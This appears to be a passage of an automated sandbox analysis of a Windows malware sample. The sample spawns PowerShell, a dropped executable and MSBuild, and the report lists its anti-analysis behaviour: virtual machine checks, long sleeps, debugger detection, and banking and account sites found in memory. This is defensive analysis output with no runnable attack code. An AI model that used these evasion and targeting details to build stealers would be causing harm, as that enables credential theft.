                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: uh3ex1.exe PID: 8092, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Memory allocated: 18F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Memory allocated: 3330000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: FC0000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 2A70000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 4A70000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 5090000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 6090000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 61C0000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 71C0000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 7550000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 8550000 memory reserve | memory write watch
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Memory allocated: 9550000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 14D0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2E70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4E70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599891
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599766
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599656
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599547
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599438
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599313
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599188
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 599078
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598969
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598844
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598735
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598610
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598485
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598360
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598235
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 598110
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 597985
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 597567
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 597438
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Thread delayed: delay time: 597293
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Window / User API: threadDelayed 689
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Window / User API: threadDelayed 3286
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6032
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3792
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1584
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2544
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599891s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599766s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599547s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599438s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599313s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599188s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -599078s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598969s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598844s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598735s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598610s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598485s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598360s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598235s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -598110s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -597985s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -597567s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -597438s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044 Thread sleep time: -597293s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 7992 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 7736 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep count: 6032 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep count: 3792 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Path1\To2\Save444\uh3ex1.exe TID: 8144 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6672 Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D59C108 FindFirstFileExW,6_2_6D59C108
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001491000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1669008971.0000000006381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0727E7E0 LdrLoadDll,8_2_0727E7E0
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D59BA57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6D59BA57
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D59D82B GetProcessHeap,6_2_6D59D82B
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D5975C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6D5975C1
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: 6_2_6D597A9A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6D597A9A
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Memory allocated: page read and write | page guard

